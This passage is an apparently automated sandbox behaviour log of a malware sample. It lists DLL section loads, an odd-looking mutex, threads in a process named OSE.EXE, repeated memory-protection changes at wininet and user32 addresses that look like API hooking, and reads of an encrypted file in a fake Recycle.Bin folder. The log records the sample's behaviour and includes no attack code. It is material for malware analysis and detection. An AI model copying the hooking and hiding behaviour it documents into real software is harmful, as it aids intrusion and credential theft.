\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1 BAE50FD
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 900000 1056768 own pid execute success or wait 1 BAE50FD
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 900000 4096 own pid execute success or wait 1 BAE50FD
C:\WINDOWS\WindowsShell.Manifest query and read commit 900000 4096 own pid readonly success or wait 1 BAE50FD
C:\WINDOWS\WindowsShell.Manifest read commit 900000 4096 own pid readonly success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 900000 4096 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\shell32.dll read commit B20000 8462336 own pid readonly success or wait 1 BAE50FD
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\comctl32.dll read commit B30000 618496 own pid readonly success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown B30000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit B30000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit B30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit B30000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit B30000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit B30000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 6506B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
3224 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 650639
3252 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 BAD6140
3180 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 BAD6140
3248 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 BAD6140
3172 2000 7C8106F9 false C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
12882 0s success or wait 228 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
3224 2000 success or wait 0 650279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 6505EC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
2000 C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2310654531
Thread created PID: 2000 TID: 3224 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2310657936
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2310659626
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: E80000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2310677557
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2310679289
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2310682568
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2310684361
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2310687230
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2310688258
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 520000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2310706915
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 520000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2310711621
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2310713905
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid object name not found 2310736010
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2310737580
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2310743100
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2310744737
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2310753812
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2310756419
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 540000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2310766786
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2310773456
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2310776189
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2310786223
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2310799099
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 900000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2310903156
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2310906791
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 900000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2310920343
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 900000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2310924384
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 900000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2310927213
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 900000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 2311054522
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2311057851
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2311061335
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: B20000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2311077074
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2311121268
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: B30000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2311135782
Thread created PID: 2000 TID: 3252 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2311151207
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2311152883
Thread delayed Time: 0 TID: 12882 success or wait 2311154286
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311154722
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311160409
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311162900
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311163195
Thread created PID: 2000 TID: 3180 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2311164855
Thread created PID: 2000 TID: 3248 EIP: 7C8106F9 Imagepath: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Injected: false success or wait 2311167739
Thread delayed Time: 0 TID: 12882 success or wait 2311170102
Thread delayed Time: 0 TID: 12882 success or wait 2311170502
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311170686
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311171766
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311176099
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311178586
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311178892
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311179201
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311180261
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311184272
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311186749
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311187052
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311187430
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311188481
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311192560
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311194964
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311196229
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311196749
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311197879
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311201922
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311204411
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311204718
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2311205716
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2311208093
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2311209448
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311224741
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311225863
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: B30000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2311230216
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311232832
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311234092
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311234495
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311235614
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311239948
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311242833
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311243134
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311243524
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311244600
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311249134
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311252076
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311252378
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311252841
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311253909
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311257980
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311260846
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311261217
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311261894
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311263039
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311267137
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311270333
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2311270632
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2311272505
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2311273514
Memory attributes changed PID: 2000 Path: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2311285112
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311286207
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311290317
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311295029
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311299115
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311304079
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311308140
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311313815
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311317875
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311323032
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311327243
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2311332014
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: B30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2311336089
